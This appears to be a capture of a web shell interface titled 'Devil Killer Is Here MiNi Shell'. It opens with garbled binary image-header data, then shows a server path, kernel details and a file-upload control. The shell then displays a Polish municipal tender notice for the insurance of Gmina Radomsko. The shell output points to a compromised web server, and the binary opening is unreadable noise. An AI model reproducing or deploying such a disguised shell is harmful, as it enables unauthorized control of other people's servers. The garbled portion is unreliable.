JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211119/0027603901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> UBEZPIECZENIE GMINY RADOMSKO W OKRESIE OD 01.01.2022 R. DO 31.12.2024 R. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radomsko</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648209</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piłsudskiego 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radomsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">44 683-46-83</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">44 685-13-60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gmina-radomsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.gmina-radomsko.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> UBEZPIECZENIE GMINY RADOMSKO W OKRESIE OD 01.01.2022 R. DO 31.12.2024 R. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8daa3538-490c-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00276039</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002704/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ubezpieczenie Gminy Radomsko w l. 2022-2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.gmina-radomsko.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">8.1.2.	W niniejszym postępowaniu komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem:<br/>- miniPortalu https://miniportal.uzp.gov.pl/, <br/>- ePUAPu https://epuap.gov.pl/wps/portal, adres Elektronicznej Skrzynki Podawczej ePUAP: /7ao3h61yf2/SkrytkaESP<br/>- oraz poczty elektronicznej na adres e-mail: sekretariat@gmina-radomsko.pl <br/>8.1.3.	Forma, w jakiej ma być złożona oferta wraz z załącznikami, w tym oświadczeń składanych w celu wstępnego potwierdzenia spełniania warunków udziału w postępowaniu/wykazania braku podstaw do wykluczenia Wykonawcy z postępowania, określona została odpowiednio w pkt. 8.2 SWZ.<br/>8.1.4.	Wykonawca biorący udział w postępowaniu o udzielenie zamówienia publicznego i zamierzający złożyć ofertę w postaci elektronicznej, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>8.1.5.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, opisane zostały w Regulaminie korzystania z miniPortalu („Warunki usługi”, https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx) oraz Regulaminie ePUAP (https://epuap.gov.pl). Dodatkowe informacje zawarte są w dokumencie „Najczęściej zadawane pytania do miniPortalu”. <br/>8.1.6.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB (przesyłane pliki należy skompresować do jednego pliku archiwum – ZIP).<br/>8.1.7.	Za datę przekazania oferty lub innych dokumentów za pośrednictwem miniPortalu, przyjmuje się datę ich przekazania na ePUAP, <br/>8.1.8.	Identyfikator postępowania i klucz publiczny dla danego postępowania o udzielenie zamówienia dostępne są na Liście wszystkich postępowań na miniPortalu. <br/>8.1.10.	Wykonawca podpisuje dokumenty kwalifikowanym podpisem elektronicznym, wystawionym przez dostawcę kwalifikowanej usługi zaufania, będącego podmiotem świadczącym usługi certyfikacyjne – podpis elektroniczny, spełniające wymogi bezpieczeństwa określone w ustawie z dn. 5 września 2016 r. o usługach zaufania oraz identyfikacji elektronicznej (Dz.U. 2020 poz. 1173 ze zm.). <br/>8.2.1.	Ofertę wraz z wymaganymi do niej załącznikami, należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. Klucz publiczny niezbędny do zaszyfrowania oferty przez Wykonawcę jest dostępny dla wykonawców na miniPortalu. W formularzu oferty Wykonawca poda swój adres skrzynki ePUAP, na którym może być prowadzona korespondencja związana z postępowaniem (zaleca się również podanie adresu email).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję że: <br/>a)	administratorem Pani/Pana danych osobowych jest Gmina Radomsko, 97-500 Radomsko, ul. Piłsudskiego 34, tel. 44 683-27-07,44 883-46-83 reprezentowana przez Wójta Gminy;<br/>b)	kontakt do inspektora ochrony danych osobowych w Gminie Radomsko, adres email: iod@gmina-radomsko.pl <br/>c)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, numer/ prowadzonym w trybie przetargu nieograniczonego<br/>d)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dn. 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i 2018), dalej „ustawa Pzp”; <br/>e)	Pani/Pana dane osobowe będą przechowywane, zgodnie z aktualnie obowiązującymi w tym zakresie przepisami;<br/>f)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>g)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h)	posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i)	nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KZP.272.61.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 137846,10 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sekcja II. 1.1.	Przedmiotem ubezpieczenia jest interes majątkowy Ubezpieczającego/ Ubezpieczonego.<br/>Przez interes majątkowy na potrzeby niniejszej Sekcji Umowy Generalnej Ubezpieczenia należy rozumieć uzyskanie od Ubezpieczyciela rekompensaty poniesionego przez Ubezpieczonego uszczerbku tzn. kwoty koniecznej do odtworzenia mienia i pokrywającej wydatki Ubezpieczonego w związku z zaistniałą szkodą albo rekompensującej uszczerbek majątkowy Ubezpieczonego w przypadku, gdy poniósł on szkodę, jednak podjął decyzję o nieodtwarzaniu zniszczonego mienia. <br/>Interes majątkowy Ubezpieczonego odnosi się do następujących kategorii mienia:<br/>1.1.1.	budynki, wraz z instalacjami zewnętrznymi i wewnętrznymi, zasilającymi, antenowymi, infrastrukturą teleinformatyczną i telekomunikacyjną, oszkleniem zewnętrznym, wewnętrznym, instalacjami odnawialnych źródeł energii oraz innymi elementami wyposażenia budynku zamontowanymi na stałe, a także budynki czasowo wyłączone z użytkowania i budynki użytkowane sezonowo;<br/>1.1.2.	budowle, w tym zdroje uliczne, oświetlenie drogowe, wiaty, garaże, ogrodzenia, mała architektura i jej elementy, kolektory deszczowe, przyłącza wody, energii elektrycznej, energii cieplnej, kanalizacyjne i gazowe, stacje transformatorowe wraz z przyłączami, sygnalizacja świetlne, słupy oświetleniowe, stacje wczesnego ostrzegania, wszelkie elementy powiązane funkcjonalnie z budowlami, inne niewymienione obiekty ujęte w sumie ubezpieczenia,<br/>1.1.3.	budowle (z wyłączeniem wskazanych w ankietach ubezpieczeniowych) i mienie zewnętrzne;<br/>1.1.4.	środki trwałe i przedmioty podlegające jednorazowej amortyzacji, w tym maszyny, urządzenia, wyposażenie, elektroniczny sprzęt stacjonarny, elektroniczny sprzęt przenośny, oprogramowanie, infrastruktura teleinformatyczna i telekomunikacyjna;<br/>1.1.5.	środki obrotowe (w tym zapasy magazynowe);<br/>1.1.6.	nakłady na adaptację pomieszczeń wynajmowanych i własnych;<br/>1.1.7.	zbiory biblioteczne;<br/>1.1.8.	gotówka;<br/>1.1.9.	mienie pracownicze.<br/>1.2.	Przedmiotem ubezpieczenia jest interes majątkowy Ubezpieczającego w odniesieniu do mienia:<br/>1.2.1.	którego jest właścicielem lub posiadaczem na podstawie zawartej umowy lub stanu faktycznego;<br/>1.2.2.	należącego do Ubezpieczonego i powierzonego innym podmiotom do użytkowania;<br/>1.2.3.	najętego na podstawie umowy leasingu, najmu, dzierżawy, użyczenia lub innej umowy o podobnym charakterze w przypadku, gdy na podstawie zawartej umowy obowiązek ubezpieczenia spoczywa na Ubezpieczonym;<br/>1.2.4.	będącego w posiadaniu Ubezpieczonego tj. zarządzanego na podstawie decyzji administracyjnych, postanowień sądu, posiadania, trwałego zarządu, a także zarządzanego zgodnie z przepisami kodeksu cywilnego o prowadzeniu cudzych spraw bez zlecenia;<br/>1.2.5.	zgłoszonego do ubezpieczenia, które w trakcie trwania Umowy Generalnej Ubezpieczenia zostało przeniesione między jednostkami organizacyjnymi Ubezpieczającego/ Ubezpieczonego, lokalizacjami jednostek lub którego własność została przeniesiona na nowo powołane jednostki Ubezpieczającego oraz którego własność została przeniesiona na bank lub Ubezpieczyciela jako zabezpieczenie wierzytelności. <br/>Sekcja II A: 1.1.	Przedmiotem ubezpieczenia jest:<br/>1.1.1.	sprzęt elektroniczny stacjonarny i przenośny wraz z oprogramowaniem;<br/>1.1.2.	nieposiadające samoistnej wartości księgowej elektroniczne części maszyn, urządzeń i aparatów oraz nieposiadające samoistnej wartości księgowej elektroniczne części składowe budynków i budowli;<br/>1.1.3.	infrastruktura teleinformatyczna i telekomunikacyjna, w tym nieposiadająca samoistnej wartości księgowej infrastruktura stanowiąca elementy składowe budynków, budowli i drogowych obiektów inżynierskich;<br/>1.1.4.	oprogramowanie i zewnętrzne nośniki danych;<br/>1.1.5.	koszty odtworzenia danych i oprogramowania.<br/>1.2.	Przedmiotem ubezpieczenia w Sekcji II A może być sprzęt elektroniczny, który w chwili podpisywania umowy lub włączenia go do umowy został włączony do eksploatacji.<br/>Sekcja II B: 1.1.	Przedmiotem ubezpieczenia są urządzenia wykorzystywane do prac i pomiarów na drogach (w tym: maszyny, sprzęt, osprzęt, narzędzia) montowane na pojazdach Ubezpieczonego oraz na pojazdach osób trzecich oraz pojazdy i urządzenia samobieżne/wolnobieżne niepodlegające obowiązkowej rejestracji.<br/>1.2.	Przedmiotem ubezpieczenia mogą być wyłącznie maszyny, urządzenia i pojazdy, które zostały włączone do eksploatacji.<br/>Sekcja III: 1.1.	Przedmiotem ubezpieczenia jest wynikająca z przepisów prawa odpowiedzialność cywilna Ubezpieczonego jako zobowiązanie do naprawienia szkody wyrządzonej osobie trzeciej.<br/>1.1.1.	Za osobę trzecią na potrzeby niniejszej Umowy uważa się każdą osobę, której przysługuje roszczenia o odszkodowanie w związku z ponoszoną przez Ubezpieczonego odpowiedzialnością cywilną.<br/>1.2.	Przedmiotem ubezpieczenia są również koszty ponoszone przez Ubezpieczonego w związku z roszczeniem, w szczególności takie jak zastosowanie dostępnych środków w celu zmniejszenia rozmiarów szkody, wynagrodzenie rzeczoznawców i koszty obrony prawnej.<br/>1.3.	Ubezpieczyciel udziela ochrony ubezpieczeniowej w granicach odpowiedzialności ponoszonej przez Ubezpieczonego określonej przepisami prawa.<br/>1.4.	Zakres ubezpieczenia obejmuje odpowiedzialność cywilną za szkody spowodowane czynem bezprawnym (odpowiedzialność deliktowa) oraz odpowiedzialność cywilną za szkody wynikłe z niewykonania lub nienależytego wykonania zobowiązania (odpowiedzialność kontraktowa), w tym zbieg tych roszczeń, a także odpowiedzialność za produkt oraz odpowiedzialność zawodową za czynności wykonywane w imieniu i/lub na rzecz Ubezpieczonego.<br/>1.5.	Ochroną ubezpieczeniową objęta jest odpowiedzialność cywilna Ubezpieczonego za szkody oraz ich następstwa:<br/>1.5.1.	na osobie (osobowe) – wskutek śmierci, uszkodzenia ciała lub rozstroju zdrowia, obejmująca również koszty leczenia i rehabilitacji, utracone korzyści poszkodowanego, które mógłby osiągnąć, gdyby nie doznał uszkodzenia ciała lub rozstroju zdrowia; szkoda na osobie obejmuje obowiązek zapłaty zadośćuczynienia będący następstwem śmierci, uszkodzenia ciała lub rozstroju zdrowia;<br/>1.5.2.	w mieniu (rzeczowe) – wskutek zniszczenia, uszkodzenia, lub utraty rzeczy, a także utracone korzyści poszkodowanego, które mógłby osiągnąć, gdyby mu szkody nie wyrządzono;<br/>1.5.3.	majątkowe (czyste straty finansowe) – wskutek poniesionych przez poszkodowanego strat niebędących szkodą na osobie lub szkodą w mieniu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 101160,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66515200-5 - Usługi ubezpieczenia własności</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sekcja II: 1.1. Ubezpieczyciel obejmie ubezpieczeniem odpowiedzialność cywilną Ubezpieczonego jako posiadacza pojazdów mechanicznych będących w posiadaniu Ubezpieczonego, zakupionych lub przejętych w trakcie trwania Umowy Generalnej Ubezpieczenia, w stosunku do których zachodzi obowiązek ubezpieczenia OC posiadaczy pojazdów mechanicznych, zgodnie z ustawą o ubezpieczeniach obowiązkowych, UFG i PBUK.<br/>1.2.	Ubezpieczeniem zostaną objęte pojazdy zgłoszone do Ubezpieczyciela. <br/>1.3.	Ubezpieczyciel naliczy składkę za ubezpieczenie OC określone w kategoriach:<br/>1.3.1.	samochody osobowe;<br/>1.3.2.	samochody specjalne;<br/>1.3.3.	przyczepy: wszystkie przyczepy i naczepy (również rolnicze);<br/>sekcja III: 1.1.	Umową ubezpieczenia objęte są trwałe następstwa nieszczęśliwych wypadków polegających na uszkodzeniu ciała lub rozstroju zdrowia, powodujących trwały uszczerbek na zdrowiu lub śmierć Ubezpieczonego – kierowcy i pasażerów - w odniesieniu do wszystkich osób znajdujących się w pojazdach zgłoszonych do ubezpieczenia a powstałych w związku z ruchem pojazdów na terenie Rzeczypospolitej Polskiej i poza jej granicami. <br/>1.2.	Ubezpieczeniem są objęte również szkody poniesione przez Ubezpieczonego podczas:<br/>1.2.1.	załadunku i rozładunku pojazdu lub zespolonej z nim części (przyczepy);<br/>1.2.2.	postoju i naprawy w czasie wykorzystywania go do wykonywania zadań służbowych;<br/>1.2.3.	garażowania oraz wskutek upadku, pożaru lub wybuchu pojazdu.<br/>Sekcja IV: 1.1.	Przedmiotem ubezpieczenia jest interes majątkowy Ubezpieczającego/Ubezpieczonego. Przez interes majątkowy na potrzeby niniejszej Sekcji Umowy Generalnej Ubezpieczenia należy rozumieć uzyskanie od Ubezpieczyciela rekompensaty poniesionego przez Ubezpieczonego uszczerbku tzn. kwoty koniecznej do odtworzenia mienia i pokrywającej wydatki Ubezpieczonego w związku z zaistniałą szkodą albo rekompensującej uszczerbek majątkowy Ubezpieczonego w przypadku, 